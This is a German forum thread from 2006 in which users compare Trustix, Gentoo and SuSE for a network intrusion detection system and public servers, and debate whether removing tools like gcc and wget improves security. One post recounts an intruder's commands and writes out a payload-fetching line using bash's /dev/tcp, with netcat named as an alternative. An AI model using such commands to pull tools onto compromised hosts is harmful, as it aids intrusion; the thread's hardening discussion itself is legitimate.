Trustix Secure Linux

Re(12): Trustix Secure Linux

sharky2 — Wed, 22 Feb 2006 15:32:59 GMT

ja, sin auch gute gründe *hehe*

Re(11): Trustix Secure Linux

gepeinigter_aon_neukunde — Wed, 22 Feb 2006 15:23:46 GMT

- Storage
- Tools, die ich nicht kenne, kommen evtl. mit einer suboptimalen Standardconfig
- Kürzere Suche nach Befehlen beim Tabbed-Eintippen

Re(10): Trustix Secure Linux

sharky2 — Wed, 22 Feb 2006 13:54:39 GMT

Es gibt einige Gründe, weniger Tools auf dem Rechner zu haben - allerdings ist die Sicherheit keiner davon.

was würdest du als grund nennen?

Re(9): Trustix Secure Linux

gepeinigter_aon_neukunde — Wed, 22 Feb 2006 13:11:19 GMT

Hey, ich will dich ja nicht dazu überreden...

Es gibt einige Gründe, weniger Tools auf dem Rechner zu haben - allerdings ist die Sicherheit keiner davon... nur gegen das Argument wehr' ich mich, nicht gegen deine Entscheidung.

Und... wenn einer in einen Unixoiden einbricht (was ja an sich net sehr trivial ist - außer es ist ein Apple ), dann bin ich fix überzeugt, daß er weitermachen will - also zumindest irgendeine SW installieren um Botnetze aufzubauen, ...

Re(8): Trustix Secure Linux

sharky2 — Wed, 22 Feb 2006 12:57:46 GMT

Echt, ob du da binaries auf deinem Rechner hast oder nicht kostet ihn maximal
10 Sekunden mehr - und als allererstes wird er sich so oder so ein rootkit downloaden...

vorausgesetzt er kommt überhaupt auf die idee.. wovon man ja nicht zu 100% ausgehen kann.
aber ich lass mich sowieso nicht davon überzeugen, dass es nur ein vorteil ist wenn man sehr viele tools drauf hat

Re(7): Trustix Secure Linux

gepeinigter_aon_neukunde — Wed, 22 Feb 2006 12:43:39 GMT

Ich hatte mal einen Server, auf dem alles drauf wahr... Im Jahr 2000 oder so.
Irgendein Schwein ist damals eingebrochen und hat (Apache/SSL-Exploit) und hat netterweise seine Logfiles net gelöscht - waren sogar die Tippfehler drin

Jedenfalls hat er dann folgendes gemacht:

uname -a
cd /dev/shm
mkdir .irgendwas
cd .irgendwas
wget ....

Wenn er kein wget und kein netcat hat, würde er wahrscheinlich
cat > meinfile.tar.bz2 < /dev/tcp/hostname/80
gemacht - und irgendwo einen Server stehen, der statt dem Apache seine binaries rausschickt...

Echt, ob du da binaries auf deinem Rechner hast oder nicht kostet ihn maximal 10 Sekunden mehr - und als allererstes wird er sich so oder so ein rootkit downloaden...

Re(6): Trustix Secure Linux

sharky2 — Wed, 22 Feb 2006 12:31:07 GMT

Mit SELinux würdest ja fein in den Griff kriegen, daß er das net kann - wolltest ja nicht

ich weiß ich sollts mir so und so mal anschauen, hat sich bis jetzt aber nicht ergeben

unabhängig von den möglichkeiten eines eindringlings.... man muss es ihm ja trotzdem nicht unbedingt leicht machen in dem an ihm alle möglichen und unmöglichen tools zur verfügung stellt - meiner meinung nach

Re(5): Trustix Secure Linux

gepeinigter_aon_neukunde — Wed, 22 Feb 2006 12:25:01 GMT

???

Also gut, dann spielt er sich halt mit netcat..
Oder notfalls mit /dev/tcp/host/port - oder sollte auch keine Bash installiert sein ?

Mit SELinux würdest ja fein in den Griff kriegen, daß er das net kann - wolltest ja nicht

Und natürlich kann er sich den Compiler nach /tmp installieren - oder wie verhinderst das ?

EDIT: Um es kurz zu machen:
Es ist absolut wichtig, die anzahl der Laufenden Prozesse auf das benötigte Minimum zu reduzieren... Nur die Binaries selbst halte ich für ungefährlich (so sie net laufen ).

Notfalls könnte ein Intruder ja einfach per Shell-Script byteweise von STDIN lesen und in eine Datei schreiben - gesteuert von seinem Windows-Rechner, der via sendkeys schickt

Wenn er also eingebrochen ist und auch nur in einem einzigen Dateisystem schreibzugriff hat - dann kann er sich /alles/ nachinstallieren...

Re(5): Trustix Secure Linux

gepeinigter_aon_neukunde — Wed, 22 Feb 2006 12:25:01 GMT

Re(4): Trustix Secure Linux

sharky2 — Wed, 22 Feb 2006 12:23:13 GMT

vorausgesetzt wget ist installiert
und auch dann kann er keinen compiler installieren ohne die nötigen rechte

Re(3): Trustix Secure Linux

gepeinigter_aon_neukunde — Wed, 22 Feb 2006 07:24:49 GMT

Naja... Jeder Eindringling holt sich eh mit wget oder so alles nach - oder er schickt sich mail

Re(2): Trustix Secure Linux

sharky2 — Tue, 21 Feb 2006 20:55:02 GMT

nun ja... für den mail server wirds, wie ich shcon in anderen postings gesagt habe, doch eher ein gentoo werden. mittlerweile mag ich's einfach nicht mehr wenn ich nach einer installation erst wieder einige dinge deinstallieren muss. man will ja keinen gcc oder sonstiges auf einem öffentlichen server haben.. jeder der in mein system einbricht würd sich freuen
bei suse muss ich da erst suchen was ich alles wieder weg haben will - auch wenns zugegebenermaßen nicht sehr viel ist.

Du hast ganz sicher nur deine 4-5 Ports offen - und wenn sich von den 103.346
Paketen 99% remote exploiten lassen - solange deine iptables passen, kann's Dir wurscht sein.

ist es aber nicht. alles was irgendwie exploitbar ist seh ich grundsätzlich als bedrohung. wer sagt mir, dass nicht aufgrund einer blöden abhängigkeit irgendwie doch was daneben geht.
besser zu paranoid als zu wenig

außerdem möcht ich einfach wissen was auf meinem kübl da alles drauf ist und damit das gefühl der vollen kontrolle über mein system haben. was kernel 2.4 betrifft, mit diesem kernel laufen derzeit sehr viele systeme, offenbar ohne probleme solange aktuelle patches eingespielt werden. also habe ich da nicht so große bedenken

Dann würde ich echt sagen, daß an SELinux kein Weg vorbeiführt

fürs SELinux war ich bis jetzt einfach zu faul. habs mir noch nie wirklich angesehen, außerdem bin ich mir nie sicher ob ich der NSA trauen soll oder nicht

Echt, das "zuviel an Paketen" würde ich nicht als Nachteil sehen - meine
Server haben auch eine vollinstallation von SuSE - denn im Problemfall mag ich sofort alle Werkzeuge bei der Hand haben.

meine server beginnen mit einer minimal-installation + den dingen die ich wirklich brauch. anschließend werden, falls verwendet, gcc, nmap usw wieder deinstalliert. es ist zwar schön, wie du sagt, alle tools gleich bei der hand zu haben, aber jeder eindringling wird sich vernutlich auch drüber freuen

Re: Trustix Secure Linux

gepeinigter_aon_neukunde — Tue, 21 Feb 2006 17:07:11 GMT

Hi !

Ich verstehe deine Sorge nicht ganz wegen der vielen SuSE-Pakete...
Wo ist das Problem ? Du hast ganz sicher nur deine 4-5 Ports offen - und wenn sich von den 103.346 Paketen 99% remote exploiten lassen - solange deine iptables passen, kann's Dir wurscht sein.

Weiter unten habe ich noch was von 2.4er-Kerneln gelesen... Da sag ich nur "Finger Weg!". Begründung (die du eh sicher teilst)

1.) Dein Server ist im INet exponiert
2.) Als Mail-Server ist er so oder so ein lohnendes Ziel
3.) Bei der Mail-Server-Config kann einem, der keine 5000 Seiten sendmail-Doku hinter sich hat (oder 4000 Seiten postfix - der geht ja einfacher ) schnell mal was schlimmes passieren.
4.) Du willst dein System wirklich bombensicher hinbekommen - und die Stabilität und Wartungsfreiheit nachher ist Dir die Vorarbeit wert...

Dann würde ich echt sagen, daß an SELinux kein Weg vorbeiführt - wichtig ist, daß es die neuesten Kernel sind (Die NSA hatte AFAIK Patches für 2.6.13 auf ihrer Website, weil der zu alt ist *gg*).

SELinux wird net einmal viel Aufwand für dein System sein - denn du wirst net viel daemons laufen haben. Oder du setzt auf Novell's AppArmor... Und kümmerst dich nur um mailserver, ...

Echt, das "zuviel an Paketen" würde ich nicht als Nachteil sehen - meine Server haben auch eine vollinstallation von SuSE - denn im Problemfall mag ich sofort alle Werkzeuge bei der Hand haben. Gestartet werden all die Daemons freilich nicht.

Re(2): Trustix Secure Linux

sharky2 — Tue, 21 Feb 2006 15:20:29 GMT

ja für mail und webserver wirds doch eher ein gentoo werden..
wie gesagt, ich finds einfach blöd, dass bei suse und fedora gleich haufenweise packete mitinstalliert werden. yast usw ist zwar recht nett, aber ohne dem ganzen schnickschnack gehts ja genauso

derzeit hab ich jetzt TSL 2.2 installiert.. 2.4rer kernel... die 3.0 hat glaub ich schon den 2.6er aber die version ist noch in der entwicklung.
also im moment bin ich grad am installiren von snort (bzw kämpfe mit den abhängigkeiten ) aber ich glaube fürs NIDS wirds beim trustix bleiben

Ich habe Trustix vor zweienhalb Jahren selbst mal fuer eine firewall aufgesetzt.

für sowas würd ich aber glaub ich gleich auf eine firewall distribution zurückgreifen.

Re: Trustix Secure Linux

raffi_ — Tue, 21 Feb 2006 15:06:28 GMT

Ich habe Trustix vor zweienhalb Jahren selbst mal fuer eine firewall aufgesetzt.
Hat einen sehr schoenen Eindruck gemacht.. (schlank etc., wie du sagst)

Allerdings glaube ich nicht, dass man es nicht unbedingt fuer einen server haben
moechte da die Pakete doch recht alt, aeh ich meine, stabil und secure waren.
Fuer ein NIDS ist es bestimmt hinreichend.

Mit RAID + Schnickschnack bist du wahrscheinlich mit einer aktuellen Distribution
besser bedient; damals wurde Trustix mit einem verhaeltnismaessig alten 2.2er Kernel ausgeliefert.

Inwiefern SuSe und Konsorten dann besser sind, laesst du am besten deinen Geschmack entscheiden.

Re(2): Trustix Secure Linux

sharky2 — Tue, 21 Feb 2006 14:34:40 GMT

hab ich mir auch schon überlegt
hats eh auch auf meinem notebook laufen

nur irgendwie hab ich mir gedacht mal was anderes auszuprobiern, nicht immer eine der "top distributionen"
vorallem ist diese distribution speziell nur auf sicherheit ausgelegt, was ja prinzipiell sehr gut klingt

aber eventuell nehm ich trustix fürs NIDS und gentoo für den mail und webserver.
wobei die ganze herumkompiliererei teilweise sehr mühsam ist. auch schon ohne die ganzen use flags zu beachten usw.

Re: Trustix Secure Linux

Ardjan — Tue, 21 Feb 2006 14:12:30 GMT

Gentoo. Nach der Erstinstall hast ein kahles System, dann kannst händisch einfach nur die Dienste hinzufügen welche gebraucht werden...

Ardjan

Trustix Secure Linux

sharky2 — Tue, 21 Feb 2006 13:45:16 GMT

Hallo!

Ich bin gerade auf der suche nach einer linux distri für ein NIDS und später auch für mail und webserver

nach einiger suche schien mir trustix ganz brauchbar, sehr schlankes system, nettes programm zum verwalten der packete, usw...
hat von euch jemand schon mit trustix gearbeitet und kann mir darüber was berichten?

weiter stellt sich mir dabei frage, was sinnvoller ist für einen mail und webserver.
trustix oder doch suse (da schon im einsatz) , speziell wegen unterstützung von einem raid

irgendwie möchte ich auf den öffentlichen servern nicht unbedingt suse laufen lassen, da suse irgendwie doch überladen ist, sprich es werden 103.346 tools installiert die ich auf keinem öffentlichen server brauche. bei einem internen ists mir recht, aber bei servern in einer DMZ heißts ja imma. nur das nötigste installieren.

vielleicht habts ihr ja noch andere vorschläge